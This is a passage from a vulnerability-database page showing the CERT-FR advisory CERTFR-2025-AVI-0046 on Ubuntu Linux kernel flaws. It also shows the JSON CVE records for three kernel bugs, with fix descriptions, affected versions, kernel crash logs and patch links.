Action not permitted
Modal body text goes here.
Modal Title
Modal Body
CERTFR-2025-AVI-0046
Vulnerability from certfr_avis - Published: - Updated:
De multiples vulnérabilités ont été découvertes dans les produits Ubuntu. Certaines d'entre elles permettent à un attaquant de provoquer une élévation de privilèges, une atteinte à la confidentialité des données et un déni de service.
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
Impacted products
References
| Title | Publication Time | Tags | |||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "Ubuntu 18.04 ESM",
"product": {
"name": "Ubuntu",
"vendor": {
"name": "Ubuntu",
"scada": false
}
}
},
{
"description": "Ubuntu 24.10",
"product": {
"name": "Ubuntu",
"vendor": {
"name": "Ubuntu",
"scada": false
}
}
}
],
"affected_systems_content": "",
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2021-47076",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-47076"
},
{
"name": "CVE-2024-35951",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35951"
},
{
"name": "CVE-2024-49967",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-49967"
},
{
"name": "CVE-2024-35965",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35965"
},
{
"name": "CVE-2024-35966",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35966"
},
{
"name": "CVE-2024-46724",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-46724"
},
{
"name": "CVE-2024-42068",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42068"
},
{
"name": "CVE-2024-53057",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-53057"
},
{
"name": "CVE-2024-42240",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42240"
},
{
"name": "CVE-2024-36952",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36952"
},
{
"name": "CVE-2024-36938",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36938"
},
{
"name": "CVE-2024-50264",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-50264"
},
{
"name": "CVE-2023-52488",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52488"
},
{
"name": "CVE-2024-26947",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26947"
},
{
"name": "CVE-2023-52639",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52639"
},
{
"name": "CVE-2024-44942",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-44942"
},
{
"name": "CVE-2023-52498",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52498"
},
{
"name": "CVE-2024-40910",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-40910"
},
{
"name": "CVE-2023-52497",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52497"
},
{
"name": "CVE-2024-38553",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-38553"
},
{
"name": "CVE-2022-48943",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48943"
},
{
"name": "CVE-2024-42077",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42077"
},
{
"name": "CVE-2024-44940",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-44940"
},
{
"name": "CVE-2024-43892",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43892"
},
{
"name": "CVE-2022-38096",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-38096"
},
{
"name": "CVE-2022-48733",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48733"
},
{
"name": "CVE-2023-52821",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52821"
},
{
"name": "CVE-2024-35963",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35963"
},
{
"name": "CVE-2021-47501",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-47501"
},
{
"name": "CVE-2024-35904",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35904"
},
{
"name": "CVE-2024-36968",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36968"
},
{
"name": "CVE-2024-38597",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-38597"
},
{
"name": "CVE-2021-47101",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-47101"
},
{
"name": "CVE-2024-42156",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42156"
},
{
"name": "CVE-2024-38538",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-38538"
},
{
"name": "CVE-2022-48938",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48938"
},
{
"name": "CVE-2021-47001",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-47001"
},
{
"name": "CVE-2024-35967",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35967"
},
{
"name": "CVE-2024-36953",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36953"
}
],
"links": [],
"reference": "CERTFR-2025-AVI-0046",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2025-01-17T00:00:00.000000"
}
],
"risks": [
{
"description": "Non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur"
},
{
"description": "D\u00e9ni de service"
},
{
"description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
},
{
"description": "\u00c9l\u00e9vation de privil\u00e8ges"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits Ubuntu. Certaines d\u0027entre elles permettent \u00e0 un attaquant de provoquer une \u00e9l\u00e9vation de privil\u00e8ges, une atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es et un d\u00e9ni de service.",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans le noyau Linux d\u0027Ubuntu",
"vendor_advisories": [
{
"published_at": "2025-01-15",
"title": "Bulletin de s\u00e9curit\u00e9 Ubuntu USN-7173-3",
"url": "https://ubuntu.com/security/notices/USN-7173-3"
},
{
"published_at": "2025-01-10",
"title": "Bulletin de s\u00e9curit\u00e9 Ubuntu USN-7169-5",
"url": "https://ubuntu.com/security/notices/USN-7169-5"
},
{
"published_at": "2025-01-14",
"title": "Bulletin de s\u00e9curit\u00e9 Ubuntu USN-7195-2",
"url": "https://ubuntu.com/security/notices/USN-7195-2"
}
]
}
CVE-2021-47001 (GCVE-0-2021-47001)
Vulnerability from cvelistv5 – Published: 2024-02-28 08:13 – Updated: 2026-05-23 15:18
VLAI
EPSS
Title
xprtrdma: Fix cwnd update ordering
Summary
In the Linux kernel, the following vulnerability has been resolved:
xprtrdma: Fix cwnd update ordering
After a reconnect, the reply handler is opening the cwnd (and thus
enabling more RPC Calls to be sent) /before/ rpcrdma_post_recvs()
can post enough Receive WRs to receive their replies. This causes an
RNR and the new connection is lost immediately.
The race is most clearly exposed when KASAN and disconnect injection
are enabled. This slows down rpcrdma_rep_create() enough to allow
the send side to post a bunch of RPC Calls before the Receive
completion handler can invoke ib_post_recv().
Severity
No CVSS data available.
Assigner
References
Impacted products
2 products
| Vendor | Product | Version | |
|---|---|---|---|
| Linux | Linux |
Affected:
2ae50ad68cd79224198b525f7bd645c9da98b6ff , < eddae8be7944096419c2ae29477a45f767d0fcd4
(git)
Affected: 2ae50ad68cd79224198b525f7bd645c9da98b6ff , < 8834ecb5df22b7ff3c9b0deba7726579bb613f95 (git) Affected: 2ae50ad68cd79224198b525f7bd645c9da98b6ff , < 19b5fa9489b5706bc878c3a522a7f771079e2fa0 (git) Affected: 2ae50ad68cd79224198b525f7bd645c9da98b6ff , < 35d8b10a25884050bb3b0149b62c3818ec59f77c (git) Affected: 3791c5982ba1eebf2900ee7ca7b9a89619c26d54 (git) Affected: 5.4.13 , < 5.5 (semver) |
|
| Linux | Linux |
Affected:
5.5
Unaffected: 0 , < 5.5 (semver) Unaffected: 5.10.38 , ≤ 5.10.* (semver) Unaffected: 5.11.22 , ≤ 5.11.* (semver) Unaffected: 5.12.5 , ≤ 5.12.* (semver) Unaffected: 5.13 , ≤ * (original_commit_for_fix) |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2021-47001",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-03-05T16:58:29.225383Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:14:54.379Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2025-04-11T22:03:12.324Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/eddae8be7944096419c2ae29477a45f767d0fcd4"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8834ecb5df22b7ff3c9b0deba7726579bb613f95"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/19b5fa9489b5706bc878c3a522a7f771079e2fa0"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/35d8b10a25884050bb3b0149b62c3818ec59f77c"
},
{
"url": "https://security.netapp.com/advisory/ntap-20250411-0001/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/sunrpc/xprtrdma/rpc_rdma.c",
"net/sunrpc/xprtrdma/verbs.c",
"net/sunrpc/xprtrdma/xprt_rdma.h"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "eddae8be7944096419c2ae29477a45f767d0fcd4",
"status": "affected",
"version": "2ae50ad68cd79224198b525f7bd645c9da98b6ff",
"versionType": "git"
},
{
"lessThan": "8834ecb5df22b7ff3c9b0deba7726579bb613f95",
"status": "affected",
"version": "2ae50ad68cd79224198b525f7bd645c9da98b6ff",
"versionType": "git"
},
{
"lessThan": "19b5fa9489b5706bc878c3a522a7f771079e2fa0",
"status": "affected",
"version": "2ae50ad68cd79224198b525f7bd645c9da98b6ff",
"versionType": "git"
},
{
"lessThan": "35d8b10a25884050bb3b0149b62c3818ec59f77c",
"status": "affected",
"version": "2ae50ad68cd79224198b525f7bd645c9da98b6ff",
"versionType": "git"
},
{
"status": "affected",
"version": "3791c5982ba1eebf2900ee7ca7b9a89619c26d54",
"versionType": "git"
},
{
"lessThan": "5.5",
"status": "affected",
"version": "5.4.13",
"versionType": "semver"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/sunrpc/xprtrdma/rpc_rdma.c",
"net/sunrpc/xprtrdma/verbs.c",
"net/sunrpc/xprtrdma/xprt_rdma.h"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.5"
},
{
"lessThan": "5.5",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.38",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.11.*",
"status": "unaffected",
"version": "5.11.22",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.12.*",
"status": "unaffected",
"version": "5.12.5",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "5.13",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.38",
"versionStartIncluding": "5.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.11.22",
"versionStartIncluding": "5.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.12.5",
"versionStartIncluding": "5.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.13",
"versionStartIncluding": "5.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "5.4.13",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nxprtrdma: Fix cwnd update ordering\n\nAfter a reconnect, the reply handler is opening the cwnd (and thus\nenabling more RPC Calls to be sent) /before/ rpcrdma_post_recvs()\ncan post enough Receive WRs to receive their replies. This causes an\nRNR and the new connection is lost immediately.\n\nThe race is most clearly exposed when KASAN and disconnect injection\nare enabled. This slows down rpcrdma_rep_create() enough to allow\nthe send side to post a bunch of RPC Calls before the Receive\ncompletion handler can invoke ib_post_recv()."
}
],
"providerMetadata": {
"dateUpdated": "2026-05-23T15:18:57.941Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/eddae8be7944096419c2ae29477a45f767d0fcd4"
},
{
"url": "https://git.kernel.org/stable/c/8834ecb5df22b7ff3c9b0deba7726579bb613f95"
},
{
"url": "https://git.kernel.org/stable/c/19b5fa9489b5706bc878c3a522a7f771079e2fa0"
},
{
"url": "https://git.kernel.org/stable/c/35d8b10a25884050bb3b0149b62c3818ec59f77c"
}
],
"title": "xprtrdma: Fix cwnd update ordering",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2021-47001",
"datePublished": "2024-02-28T08:13:23.482Z",
"dateReserved": "2024-02-27T18:42:55.950Z",
"dateUpdated": "2026-05-23T15:18:57.941Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2021-47076 (GCVE-0-2021-47076)
Vulnerability from cvelistv5 – Published: 2024-03-01 21:15 – Updated: 2026-05-11 13:47
VLAI
EPSS
Title
RDMA/rxe: Return CQE error if invalid lkey was supplied
Summary
In the Linux kernel, the following vulnerability has been resolved:
RDMA/rxe: Return CQE error if invalid lkey was supplied
RXE is missing update of WQE status in LOCAL_WRITE failures. This caused
the following kernel panic if someone sent an atomic operation with an
explicitly wrong lkey.
[leonro@vm ~]$ mkt test
test_atomic_invalid_lkey (tests.test_atomic.AtomicTest) ...
WARNING: CPU: 5 PID: 263 at drivers/infiniband/sw/rxe/rxe_comp.c:740 rxe_completer+0x1a6d/0x2e30 [rdma_rxe]
Modules linked in: crc32_generic rdma_rxe ip6_udp_tunnel udp_tunnel rdma_ucm rdma_cm ib_umad ib_ipoib iw_cm ib_cm mlx5_ib ib_uverbs ib_core mlx5_core ptp pps_core
CPU: 5 PID: 263 Comm: python3 Not tainted 5.13.0-rc1+ #2936
Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1.13.0-0-gf21b5a4aeb02-prebuilt.qemu.org 04/01/2014
RIP: 0010:rxe_completer+0x1a6d/0x2e30 [rdma_rxe]
Code: 03 0f 8e 65 0e 00 00 3b 93 10 06 00 00 0f 84 82 0a 00 00 4c 89 ff 4c 89 44 24 38 e8 2d 74 a9 e1 4c 8b 44 24 38 e9 1c f5 ff ff <0f> 0b e9 0c e8 ff ff b8 05 00 00 00 41 bf 05 00 00 00 e9 ab e7 ff
RSP: 0018:ffff8880158af090 EFLAGS: 00010246
RAX: 0000000000000000 RBX: ffff888016a78000 RCX: ffffffffa0cf1652
RDX: 1ffff9200004b442 RSI: 0000000000000004 RDI: ffffc9000025a210
RBP: dffffc0000000000 R08: 00000000ffffffea R09: ffff88801617740b
R10: ffffed1002c2ee81 R11: 0000000000000007 R12: ffff88800f3b63e8
R13: ffff888016a78008 R14: ffffc9000025a180 R15: 000000000000000c
FS: 00007f88b622a740(0000) GS:ffff88806d540000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 00007f88b5a1fa10 CR3: 000000000d848004 CR4: 0000000000370ea0
DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
Call Trace:
rxe_do_task+0x130/0x230 [rdma_rxe]
rxe_rcv+0xb11/0x1df0 [rdma_rxe]
rxe_loopback+0x157/0x1e0 [rdma_rxe]
rxe_responder+0x5532/0x7620 [rdma_rxe]
rxe_do_task+0x130/0x230 [rdma_rxe]
rxe_rcv+0x9c8/0x1df0 [rdma_rxe]
rxe_loopback+0x157/0x1e0 [rdma_rxe]
rxe_requester+0x1efd/0x58c0 [rdma_rxe]
rxe_do_task+0x130/0x230 [rdma_rxe]
rxe_post_send+0x998/0x1860 [rdma_rxe]
ib_uverbs_post_send+0xd5f/0x1220 [ib_uverbs]
ib_uverbs_write+0x847/0xc80 [ib_uverbs]
vfs_write+0x1c5/0x840
ksys_write+0x176/0x1d0
do_syscall_64+0x3f/0x80
entry_SYSCALL_64_after_hwframe+0x44/0xae
Severity
No CVSS data available.
Assigner
References
Impacted products
2 products
| Vendor | Product | Version | |
|---|---|---|---|
| Linux | Linux |
Affected:
8700e3e7c4857d28ebaa824509934556da0b3e76 , < a81e72d49b0648f68ab201163dbfc7841056d7a2
(git)
Affected: 8700e3e7c4857d28ebaa824509934556da0b3e76 , < abe31d25facdb9109fe2cf69890748295291570c (git) Affected: 8700e3e7c4857d28ebaa824509934556da0b3e76 , < dc07628bd2bbc1da768e265192c28ebd301f509d (git) |
|
| Linux | Linux |
Affected:
4.8
Unaffected: 0 , < 4.8 (semver) Unaffected: 5.10.241 , ≤ 5.10.* (semver) Unaffected: 5.12.7 , ≤ 5.12.* (semver) Unaffected: 5.13 , ≤ * (original_commit_for_fix) |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2021-47076",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-03-07T17:09:55.049735Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:14:42.532Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2025-11-03T17:30:52.908Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/abe31d25facdb9109fe2cf69890748295291570c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/dc07628bd2bbc1da768e265192c28ebd301f509d"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2025/10/msg00007.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/infiniband/sw/rxe/rxe_comp.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "a81e72d49b0648f68ab201163dbfc7841056d7a2",
"status": "affected",
"version": "8700e3e7c4857d28ebaa824509934556da0b3e76",
"versionType": "git"
},
{
"lessThan": "abe31d25facdb9109fe2cf69890748295291570c",
"status": "affected",
"version": "8700e3e7c4857d28ebaa824509934556da0b3e76",
"versionType": "git"
},
{
"lessThan": "dc07628bd2bbc1da768e265192c28ebd301f509d",
"status": "affected",
"version": "8700e3e7c4857d28ebaa824509934556da0b3e76",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/infiniband/sw/rxe/rxe_comp.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.8"
},
{
"lessThan": "4.8",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.241",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.12.*",
"status": "unaffected",
"version": "5.12.7",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "5.13",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.241",
"versionStartIncluding": "4.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.12.7",
"versionStartIncluding": "4.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.13",
"versionStartIncluding": "4.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nRDMA/rxe: Return CQE error if invalid lkey was supplied\n\nRXE is missing update of WQE status in LOCAL_WRITE failures. This caused\nthe following kernel panic if someone sent an atomic operation with an\nexplicitly wrong lkey.\n\n[leonro@vm ~]$ mkt test\ntest_atomic_invalid_lkey (tests.test_atomic.AtomicTest) ...\n WARNING: CPU: 5 PID: 263 at drivers/infiniband/sw/rxe/rxe_comp.c:740 rxe_completer+0x1a6d/0x2e30 [rdma_rxe]\n Modules linked in: crc32_generic rdma_rxe ip6_udp_tunnel udp_tunnel rdma_ucm rdma_cm ib_umad ib_ipoib iw_cm ib_cm mlx5_ib ib_uverbs ib_core mlx5_core ptp pps_core\n CPU: 5 PID: 263 Comm: python3 Not tainted 5.13.0-rc1+ #2936\n Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1.13.0-0-gf21b5a4aeb02-prebuilt.qemu.org 04/01/2014\n RIP: 0010:rxe_completer+0x1a6d/0x2e30 [rdma_rxe]\n Code: 03 0f 8e 65 0e 00 00 3b 93 10 06 00 00 0f 84 82 0a 00 00 4c 89 ff 4c 89 44 24 38 e8 2d 74 a9 e1 4c 8b 44 24 38 e9 1c f5 ff ff \u003c0f\u003e 0b e9 0c e8 ff ff b8 05 00 00 00 41 bf 05 00 00 00 e9 ab e7 ff\n RSP: 0018:ffff8880158af090 EFLAGS: 00010246\n RAX: 0000000000000000 RBX: ffff888016a78000 RCX: ffffffffa0cf1652\n RDX: 1ffff9200004b442 RSI: 0000000000000004 RDI: ffffc9000025a210\n RBP: dffffc0000000000 R08: 00000000ffffffea R09: ffff88801617740b\n R10: ffffed1002c2ee81 R11: 0000000000000007 R12: ffff88800f3b63e8\n R13: ffff888016a78008 R14: ffffc9000025a180 R15: 000000000000000c\n FS: 00007f88b622a740(0000) GS:ffff88806d540000(0000) knlGS:0000000000000000\n CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n CR2: 00007f88b5a1fa10 CR3: 000000000d848004 CR4: 0000000000370ea0\n DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\n DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\n Call Trace:\n rxe_do_task+0x130/0x230 [rdma_rxe]\n rxe_rcv+0xb11/0x1df0 [rdma_rxe]\n rxe_loopback+0x157/0x1e0 [rdma_rxe]\n rxe_responder+0x5532/0x7620 [rdma_rxe]\n rxe_do_task+0x130/0x230 [rdma_rxe]\n rxe_rcv+0x9c8/0x1df0 [rdma_rxe]\n rxe_loopback+0x157/0x1e0 [rdma_rxe]\n rxe_requester+0x1efd/0x58c0 [rdma_rxe]\n rxe_do_task+0x130/0x230 [rdma_rxe]\n rxe_post_send+0x998/0x1860 [rdma_rxe]\n ib_uverbs_post_send+0xd5f/0x1220 [ib_uverbs]\n ib_uverbs_write+0x847/0xc80 [ib_uverbs]\n vfs_write+0x1c5/0x840\n ksys_write+0x176/0x1d0\n do_syscall_64+0x3f/0x80\n entry_SYSCALL_64_after_hwframe+0x44/0xae"
}
],
"providerMetadata": {
"dateUpdated": "2026-05-11T13:47:36.943Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/a81e72d49b0648f68ab201163dbfc7841056d7a2"
},
{
"url": "https://git.kernel.org/stable/c/abe31d25facdb9109fe2cf69890748295291570c"
},
{
"url": "https://git.kernel.org/stable/c/dc07628bd2bbc1da768e265192c28ebd301f509d"
}
],
"title": "RDMA/rxe: Return CQE error if invalid lkey was supplied",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2021-47076",
"datePublished": "2024-03-01T21:15:13.395Z",
"dateReserved": "2024-02-29T22:33:44.297Z",
"dateUpdated": "2026-05-11T13:47:36.943Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2021-47101 (GCVE-0-2021-47101)
Vulnerability from cvelistv5 – Published: 2024-03-04 18:10 – Updated: 2026-05-11 13:48
VLAI
EPSS
Title
asix: fix uninit-value in asix_mdio_read()
Summary
In the Linux kernel, the following vulnerability has been resolved:
asix: fix uninit-value in asix_mdio_read()
asix_read_cmd() may read less than sizeof(smsr) bytes and in this case
smsr will be uninitialized.
Fail log:
BUG: KMSAN: uninit-value in asix_check_host_enable drivers/net/usb/asix_common.c:82 [inline]
BUG: KMSAN: uninit-value in asix_check_host_enable drivers/net/usb/asix_common.c:82 [inline] drivers/net/usb/asix_common.c:497
BUG: KMSAN: uninit-value in asix_mdio_read+0x3c1/0xb00 drivers/net/usb/asix_common.c:497 drivers/net/usb/asix_common.c:497
asix_check_host_enable drivers/net/usb/asix_common.c:82 [inline]
asix_check_host_enable drivers/net/usb/asix_common.c:82 [inline] drivers/net/usb/asix_common.c:497
asix_mdio_read+0x3c1/0xb00 drivers/net/usb/asix_common.c:497 drivers/net/usb/asix_common.c:497
Severity
No CVSS data available.
Assigner
References
Impacted products
2 products
| Vendor | Product | Version | |
|---|---|---|---|
| Linux | Linux |
Affected:
d9fe64e511144c1ee7d7555b4111f09dde9692ef , < d259f621c85949f30cc578cac813b82bb5169f56
(git)
Affected: d9fe64e511144c1ee7d7555b4111f09dde9692ef , < 8035b1a2a37a29d8c717ef84fca8fe7278bc9f03 (git) |
|
| Linux | Linux |
Affected:
4.9
Unaffected: 0 , < 4.9 (semver) Unaffected: 5.15.12 , ≤ 5.15.* (semver) Unaffected: 5.16 , ≤ * (original_commit_for_fix) |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2021-47101",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-03-04T19:39:32.875993Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-07-05T17:21:05.793Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-04T05:24:39.894Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d259f621c85949f30cc578cac813b82bb5169f56"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8035b1a2a37a29d8c717ef84fca8fe7278bc9f03"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/usb/asix_common.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "d259f621c85949f30cc578cac813b82bb5169f56",
"status": "affected",
"version": "d9fe64e511144c1ee7d7555b4111f09dde9692ef",
"versionType": "git"
},
{
"lessThan": "8035b1a2a37a29d8c717ef84fca8fe7278bc9f03",
"status": "affected",
"version": "d9fe64e511144c1ee7d7555b4111f09dde9692ef",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/usb/asix_common.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.9"
},
{
"lessThan": "4.9",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.12",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "5.16",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.12",
"versionStartIncluding": "4.9",
"vulnerable": true
},
{
